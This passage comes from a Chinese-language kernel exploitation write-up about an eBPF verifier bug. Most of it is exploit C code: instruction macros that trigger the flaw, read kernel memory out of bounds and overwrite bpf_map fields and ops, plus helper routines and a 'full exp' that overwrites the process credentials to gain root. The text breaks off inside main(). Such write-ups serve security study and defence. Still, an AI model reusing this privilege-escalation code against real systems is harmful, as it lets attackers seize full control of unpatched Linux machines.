return map->spin_lock_off >= 0;
}
  • 若 flags 设置了 BPF_F_LOCK 标志位,则会检查 map->spin_lock_off 是否大于等于 0,因此这里我们还要将该字段改为一个正整数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd)                  \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map 中的各个条目:
    • spin_lock_off = 0x2000(绕过 map_update_elem 中的检查)
    • max_entries = 0xffffffff(为了满足 key < map.max_entries 的条件)
    • map_type = 23(BPF_MAP_TYPE_STACK)(为了使 bpf_map->ops->map_push_elem 能被调用)
    • ops = target_addr(设置写入的目标地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* 读取bpf_map->ops,以保证程序的正常功能 */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* 覆写bpf_map->ops->map_push_elem */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

在获取以上所有组件之后,程序的入侵步骤如下:

  • 泄露 map_ops_addr 计算内核基地址
  • 泄露 map_addr
  • 利用 RAA 扫描内存,泄露 current_taskcurrent_cred
  • 覆盖 bpf_map->ops->map_push_elem,为 WAA 做准备
  • 利用 WAA 覆盖 current_cred 并进行提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>

static __always_inline void err_print(const char *msg)
{
printf("\033[31m\033[1m[x] Run eBPF error: \033[0m%s\n", msg);
}

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM \
})

#define BPF_ALU64_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU32_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU64_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU32_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV64_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV32_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV64_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV32_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_DW | BPF_IMM, DST, SRC, 0, (uint32_t) (IMM)),\
BPF_RAW_INSN(0, 0, 0, 0, ((uint64_t) (IMM)) >> 32)

#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */
#define BPF_LD_ABS(SIZE, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, 0, 0, 0, IMM)

/* dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, DST, SRC, OFF, OP)

#define BPF_STX_XADD(SIZE, DST, SRC, OFF) \
BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* *(uint *) (dst_reg + off16) = imm */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() \
BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#ifndef __user
#define __user
#endif

#ifndef __rcu
#define __rcu
#endif

struct bpf_map;
struct btf;
struct btf_type;
struct bpf_prog;
struct bpf_prog_aux;
struct poll_table_struct;
struct vm_area_struct;
struct bpf_local_storage_map;

/* map is generic key/value storage optionally accesible by eBPF programs */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
void *(*map_lookup_elem_sys_only)(struct bpf_map *map, void *key);
int (*map_lookup_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_lookup_and_delete_batch)(struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_update_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_delete_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);

/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value,
uint64_t flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, uint64_t flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);

/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
uint32_t (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf *btf,
const struct btf_type *key_type,
const struct btf_type *value_type);

/* Prog poke tracking helpers. */
int (*map_poke_track)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_untrack)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_run)(struct bpf_map *map, uint32_t key,
struct bpf_prog *old, struct bpf_prog *new);

/* Direct value access helpers. */
int (*map_direct_value_addr)(const struct bpf_map *map,
uint64_t *imm, uint32_t off);
int (*map_direct_value_meta)(const struct bpf_map *map,
uint64_t imm, uint32_t *off);
int (*map_mmap)(struct bpf_map *map, struct vm_area_struct *vma);
__poll_t (*map_poll)(struct bpf_map *map, struct file *filp,
struct poll_table_struct *pts);

/* Functions called by bpf_local_storage maps */
int (*map_local_storage_charge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
void (*map_local_storage_uncharge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);

/* map_meta_equal must be implemented for maps that can be
* used as an inner map. It is a runtime check to ensure
* an inner map can be inserted to an outer map.
*
* Some properties of the inner map has been used during the
* verification time. When inserting an inner map at the runtime,
* map_meta_equal has to ensure the inserting map has the same
* properties that the verifier has used earlier.
*/
int (*map_meta_equal)(const struct bpf_map *meta0,
const struct bpf_map *meta1);

/* BTF name and id of struct allocated by map_alloc */
const char * const map_btf_name;
int *map_btf_id;

/* bpf_iter info used to open a seq_file */
const struct bpf_iter_seq_info *iter_seq_info;
};

static __always_inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_load_prog(unsigned int prog_type, struct bpf_insn *insns, uint64_t insn_cnt,
char *log_buf, unsigned int log_buf_sz, unsigned int log_level)
{
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (uint64_t) insns,
.insn_cnt = insn_cnt,
.license = (uint64_t) "GPL",
.log_level = log_level,
.log_buf = (uint64_t) log_buf,
.log_size = log_buf_sz,
};

return bpf(BPF_PROG_LOAD, &attr);
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};

return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.value = (uint64_t) value,
};

return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd,const void *key,const void *value,uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.value = (uint64_t) value,
.flags = flags,
};

return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void *key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
};

return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.next_key = (uint64_t) value,
};

return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

#define BPF_LOG_BUF_SZ 0x100000
static char bpf_log_buf[BPF_LOG_BUF_SZ] = { '\0' };

/**
* @brief Run a bpf prog by attaching to a pair of sockets and sending packets
*
* @param insns bpf program to be run
* @param insn_cnt number of bpf instructions
* @return int 0 for success, others for failure
*/
static int
run_bpf_prog(struct bpf_insn *insns, uint64_t insn_cnt, unsigned int log_level,
unsigned int print_log)
{
char *err_msg = NULL;
int sock_fd[2], prog_fd;
int ret;

/* socket pair to trigger eBPF prog */
ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, sock_fd);
if (ret < 0) {
err_msg = "FAILED to creat socket pair!";
goto err_socket;
}

memset(bpf_log_buf, 0, sizeof(bpf_log_buf));

/* load bpf prog into kernel */
prog_fd = bpf_load_prog(BPF_PROG_TYPE_SOCKET_FILTER, insns, insn_cnt,
bpf_log_buf, BPF_LOG_BUF_SZ, log_level);
if (prog_fd < 0) {
ret = prog_fd;
err_msg = "FAILED to load bpf program!";
goto err_bpf_load;
}

/* attach bpf prog to a socket */
ret = setsockopt(sock_fd[0],SOL_SOCKET,SO_ATTACH_BPF, &prog_fd,sizeof(int));
if (ret < 0) {
err_msg = "FAILED to attach the bpf program!";
goto err_bpf_attach;
}

/* send a packet to trigger bpf */
write(sock_fd[1], "11111111", 8);

/* output the log */
if (print_log != 0) {
puts(bpf_log_buf);
}

/* recycle resource */
close(prog_fd);
close(sock_fd[1]);
close(sock_fd[0]);

return 0;

err_bpf_attach:
close(prog_fd);
err_bpf_load:
puts(bpf_log_buf);
close(sock_fd[1]);
close(sock_fd[0]);
err_socket:
err_print(err_msg);
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define ARRAY_MAP_OPS 0xffffffff822363e0
#define ARRAY_MAP_GET_NEXT_KEY 0xffffffff81239c80
#define INIT_TASK 0xffffffff82e1b400
#define INIT_CRED 0xffffffff82e88f20

#define VULN_REG BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)

#define MAKE_VULN_REG(__map_fd) \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define LEAK_MAP_OPS(__map_fd) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

#define LEAK_MAP_ADDR(__map_fd) \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV32_REG(VULN_REG, VULN_REG), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_8), \
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0)

#define READ_ARBITRARY_ADDR(__map_fd, __idx) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)

#define MAKE_ARBITRARY_WRITE_OPS(__map_fd) \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)

size_t fake_ops_addr;
size_t map_addr;
size_t map_ops_addr;
size_t current_task;
size_t current_cred;

static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* read ops */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* load ops */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *)){
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

key = 0;
